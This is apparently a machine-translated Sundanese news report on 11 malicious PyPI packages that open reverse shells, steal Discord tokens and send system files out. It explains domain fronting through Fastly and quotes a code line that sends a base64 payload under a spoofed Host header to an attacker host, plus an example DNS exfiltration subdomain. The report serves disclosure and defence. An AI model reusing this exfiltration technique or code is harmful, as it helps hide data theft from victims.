Dina diréktori PyPI (Python Package Index), 11 bungkusan anu ngandung kode jahat diidentifikasi. Sateuacan masalah diidentifikasi, pakét parantos diunduh sakitar 38 rébu kali total. Bungkusan jahat anu dideteksi kasohor ku cara ngagunakeun metode anu canggih pikeun nyumputkeun saluran komunikasi sareng server panyerang.
- importantpackage (6305 undeuran), important-package (12897) - ngadegkeun sambungan ka server éksternal dina kedok nyambungkeun ka pypi.python.org pikeun nyadiakeun aksés cangkang kana sistem (cangkang sabalikna) sarta ngagunakeun program trevorc2 pikeun nyumputkeun saluran komunikasi.
- pptest (10001), ipboards (946) - nganggo DNS salaku saluran komunikasi pikeun ngirimkeun inpormasi ngeunaan sistem (dina pakét kahiji nami host, diréktori kerja, IP internal sareng éksternal, anu kadua - nami pangguna sareng nami host) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - ngaidentipikasi token jasa Discord dina sistem sareng dikirim ka host éksternal.
- trrfab (287) - ngirimkeun identifier, ngaran host sareng eusi /etc/passwd, /etc/hosts, /home ka host éksternal.
- 10Cent10 (490) - ngadegkeun sambungan cangkang sabalikna kalawan host éksternal.
- yandex-yt (4183) - nampilkeun pesen ngeunaan sistem anu badé dikompromi sareng dialihkeun ka halaman kalayan inpormasi tambahan ngeunaan tindakan salajengna anu dikaluarkeun ngaliwatan nda.ya.ru (api.ya.cc).
Catetan khusus nyaéta metodeu pikeun ngakses host éksternal anu dianggo dina pakét penting sareng pakét penting, anu nganggo jaringan pangiriman eusi Fastly anu dianggo dina diréktori PyPI pikeun nyumputkeun kagiatanana. Nyatana, pamundut dikirim ka server pypi.python.org (kalebet netepkeun nami python.org dina SNI di jero pamundut HTTPS), tapi lulugu "Host" HTTP kalebet nami server anu dikawasa ku panyerang (detik. forward.io. global.prod.fastly.net). Jaringan pangiriman eusi ngirimkeun pamundut anu sami ka server anu nyerang, nganggo parameter sambungan TLS ka pypi.python.org nalika ngirimkeun data.
Infrastruktur PyPI dikuatkeun ku jaringan pangiriman eusi Fastly, anu nganggo proxy transparan Varnish pikeun nyéépkeun pamundut anu biasa, sareng ogé ngagunakeun pamrosésan sertipikat TLS dina tingkat CDN, tinimbang dina pangladén tungtung, pikeun neraskeun pamundut HTTPS ngalangkungan proxy. Paduli target host, requests dikirim ka proxy, nu nangtukeun host dipikahoyong ngagunakeun HTTP "Host" lulugu, sarta ngaran domain host anu dihijikeun ka CDN beban balancer alamat IP anu has pikeun sakabéh klien Fastly.
Server panyerang ogé ngadaptar sareng CDN Fastly, anu nyayogikeun rencana gratis ka sadayana bahkan ngamungkinkeun pendaptaran anonim. Éta noteworthy yén pikeun ngirim requests ka korban nalika nyieun "cangkang sabalikna", skéma ogé dipaké, tapi ngagagas ti sisi host lawan. Ti luar, interaksi sareng server panyerang sapertos sési anu sah sareng diréktori PyPI, énkripsi nganggo sertipikat PyPI TLS. Téhnik anu sami, anu katelah "domain fronting," saacanna aktip dianggo pikeun nyumputkeun nami host nalika ngalangkungan blocking, ngagunakeun kamampuan anu disayogikeun dina sababaraha jaringan CDN pikeun ngaksés HTTPS ku nunjukkeun host fiktif dina SNI sareng leres-leres ngirimkeun nami éta. dipénta host dina lulugu HTTP Host dina sési TLS.
Pikeun nyumputkeun kagiatan jahat, pakét TrevorC2 ogé dianggo pikeun ngalakukeun interaksi sareng server anu sami sareng navigasi wéb biasa, contona, pamundut jahat dikirim dina samaran pikeun ngaunduh gambar "https://pypi.python.org/images/ guid = "kalayan encoding inpormasi dina parameter guid. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Bungkusan pptest sareng ipboards ngagunakeun pendekatan anu béda pikeun nyumputkeun kagiatan jaringan, dumasar kana panyandian inpormasi anu mangpaat dina pamundut ka server DNS. Malware nu ngirimkeun informasi ku ngajalankeun requests DNS kawas "nu4timjagq4fimbuhe.example.com", nu data dikirimkeun ka server kontrol disandikeun ngagunakeun format base64 dina ngaran subdomain. Panyerang nampi pesen ieu ku cara ngadalikeun pangladén DNS pikeun domain example.com.
sumber: opennet.ru